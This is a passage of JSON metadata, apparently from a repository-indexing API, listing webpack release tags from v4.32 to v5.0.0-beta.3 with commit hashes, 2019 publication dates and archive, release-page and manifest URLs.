/webpack/webpack/tar.gz/v5.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3/manifests"},{"name":"v5.0.0-beta.2","sha":"b3e42f3d67df70d5d7cadb47efa2078b97a01ab8","kind":"tag","published_at":"2019-10-31T07:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2/manifests"},{"name":"v5.0.0-beta.1","sha":"4940cb1536967ecfafb4267b2e912ef376481896","kind":"tag","published_at":"2019-10-22T15:56:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1/manifests"},{"name":"v4.41.2","sha":"11e94dd2d0a8d8baae75e715ff8a69f27a9e3014","kind":"tag","published_at":"2019-10-15T13:01:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2/manifests"},{"name":"v5.0.0-beta.0","sha":"1bd85218c0e5adc54f381a63e4187e5fe435a81f","kind":"tag","published_at":"2019-10-11T12:58:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0/manifests"},{"name":"v5.0.0-alpha.32","sha":"8a73bc411b470f5d211053c99efbc1569d630f1b","kind":"tag","published_at":"2019-10-11T12:55:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32/manifests"},{"name":"v4.41.1","sha":"dcfda0061cef24d68312216893da0b38f4a670f9","kind":"tag","published_at":"2019-10-11T11:42:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1/manifests"},{"name":"v5.0.0-alpha.31","sha":"2bebf88509441835b71af9904e574ea6303642b7","kind":"tag","published_at":"2019-10-10T20:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31/manifests"},{"name":"v5.0.0-alpha.30","sha":"05a01f3c281fec762c392ae1516ab32cc564859d","kind":"tag","published_at":"2019-10-07T14:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30/manifests"},{"name":"v5.0.0-alpha.29","sha":"6709efb409383aae3c7821c1eea85de107f777b7","kind":"tag","published_at":"2019-10-02T06:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29/manifests"},{"name":"v5.0.0-alpha.28","sha":"5aeef4793592113fe354a2f7f4a56dcb2c253dbe","kind":"tag","published_at":"2019-09-26T21:04:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28/manifests"},{"name":"v5.0.0-alpha.27","sha":"b9ffbbaec3f6f5da2cab010baa928bbc545db918","kind":"tag","published_at":"2019-09-25T22:48:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27/manifests"},{"name":"v4.41.0","sha":"36e318b75c62f4f4a95597e75ecf09d92069f3c4","kind":"tag","published_at":"2019-09-24T15:45:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0/manifests"},{"name":"v4.40.3","sha":"b58560cf5cafdfe47a3ac3424a3d6ee95954759b","kind":"tag","published_at":"2019-09-24T15:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3/manifests"},{"name":"v4.40.2","sha":"d1fffd8bbeb024d1452a7f7a33a4c0c87604d8ec","kind":"tag","published_at":"2019-09-13T14:29:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2/manifests"},{"name":"v4.40.1","sha":"e4c7d8c0ae0c93306f07920bc28fe72119bc098a","kind":"tag","published_at":"2019-09-13T07:07:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1/manifests"},{"name":"v4.40.0","sha":"9c6b36787fe43581d6c568e64b71656274c04881","kind":"tag","published_at":"2019-09-12T18:52:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0/manifests"},{"name":"v5.0.0-alpha.26","sha":"77ef20c1e3e57149053588785f69a69a41f542fc","kind":"tag","published_at":"2019-09-08T20:58:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26/manifests"},{"name":"v5.0.0-alpha.25","sha":"332a14596af7a5792b7b041aeb0cd7544a509c37","kind":"tag","published_at":"2019-09-06T13:37:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25/manifests"},{"name":"v5.0.0-alpha.24","sha":"7c7c96d18c410f6cd4bf15db26650309661c75ea","kind":"tag","published_at":"2019-09-05T12:13:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24/manifests"},{"name":"v5.0.0-alpha.23","sha":"4a88ea6de08677d4538201605408b42bdaa9c8c7","kind":"tag","published_at":"2019-08-27T17:17:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23/manifests"},{"name":"v4.39.3","sha":"94929a59a79bc79cab789804d5592c3ec0605cc4","kind":"tag","published_at":"2019-08-27T12:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3/manifests"},{"name":"v5.0.0-alpha.22","sha":"4bd900e790611f32431d46ec4af559bc90d267ff","kind":"tag","published_at":"2019-08-23T13:16:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22/manifests"},{"name":"v5.0.0-alpha.21","sha":"2a7f242968c2597fb9b955645fe7f4b57b61d62e","kind":"tag","published_at":"2019-08-22T19:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21/manifests"},{"name":"v5.0.0-alpha.20","sha":"8e1ea8385d10c13c15c79eb9c4146e071ef8d565","kind":"tag","published_at":"2019-08-14T08:21:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20/manifests"},{"name":"v4.39.2","sha":"7265427acf9cd4f0f36f05c1ba16a0abedb7bbc1","kind":"tag","published_at":"2019-08-13T17:45:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2/manifests"},{"name":"v5.0.0-alpha.19","sha":"1aefa1116b7d54e445e606aa4cffb3a4ec82cd7a","kind":"tag","published_at":"2019-08-06T14:37:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19/manifests"},{"name":"v4.39.1","sha":"f29445d46624ef4726465e27bbe6e003aa07f8be","kind":"tag","published_at":"2019-08-02T12:35:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1/manifests"},{"name":"v4.39.0","sha":"5344837ed67479b838ad07ff353919d41f5d2b9f","kind":"tag","published_at":"2019-08-01T15:30:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0/manifests"},{"name":"v4.38.0","sha":"ae3db13d7db6dbcdc27f2f3095b532c60c9de1c9","kind":"tag","published_at":"2019-07-26T07:26:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0/manifests"},{"name":"v4.37.0","sha":"04b0d6b4eaa0e18629998e28f795914291c34723","kind":"tag","published_at":"2019-07-23T09:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0/manifests"},{"name":"v4.36.1","sha":"92caa5de066ded4232a119752bd5dde1497606ef","kind":"tag","published_at":"2019-07-17T13:58:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1/manifests"},{"name":"v4.36.0","sha":"95d21bb39a1e700f28be776b300492c50a169fc7","kind":"tag","published_at":"2019-07-17T11:32:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0/manifests"},{"name":"v5.0.0-alpha.18","sha":"9d05b680f02b7bdae81eff47a18f95d1f21ed053","kind":"tag","published_at":"2019-07-08T20:25:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18/manifests"},{"name":"v4.35.3","sha":"4ec90ceba4206aeb91d4c0f7e12dc889d238001e","kind":"tag","published_at":"2019-07-08T13:53:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3/manifests"},{"name":"v5.0.0-alpha.17","sha":"7ade38d01107be2f55277b61fb683341884cdc7c","kind":"tag","published_at":"2019-07-01T10:22:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17/manifests"},{"name":"v4.35.2","sha":"bf3e869a423a60581dcb64e215b8d14403e997f2","kind":"tag","published_at":"2019-07-01T09:18:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2/manifests"},{"name":"v4.35.1","sha":"569dd6a2d2e31f218578c79a4b25dfe61baf6c08","kind":"tag","published_at":"2019-07-01T09:07:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1/manifests"},{"name":"v4.35.0","sha":"c3377ef76ec708ed9c55314e8386f438abea178c","kind":"tag","published_at":"2019-06-19T19:15:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0/manifests"},{"name":"v5.0.0-alpha.16","sha":"56b8aa7006df3c7c9d6634dd11fc6a9f5bac9644","kind":"tag","published_at":"2019-06-14T13:25:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16/manifests"},{"name":"v4.34.0","sha":"34c86675728430c0f41fe415dbbacf87b5a2875d","kind":"tag","published_at":"2019-06-12T23:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0/manifests"},{"name":"v5.0.0-alpha.15","sha":"224daec09d68f17ef705eafc9ecafeb3fa7fd7a9","kind":"tag","published_at":"2019-06-05T16:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15/manifests"},{"name":"v4.33.0","sha":"d45bec3518f53153287ff2cad3cfae9d2b248d9a","kind":"tag","published_at":"2019-06-04T19:32:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0/manifests"},{"name":"v5.0.0-alpha.14","sha":"0037e7355a147cf0fe8df9c56f1b9515b1a87f88","kind":"tag","published_at":"2019-05-23T07:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14/manifests"},{"name":"v4.32.2","sha":"5d3004cccd3dd5af2721c39a7a8a27b12b3d0c19","kind":"tag","published_at":"2019-05-22T23:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2/manifests"},{"name":"v4.32.1","sha":"87fc33edbec46f721a2186194f2bc0c8fc14b464","kind":"tag","publish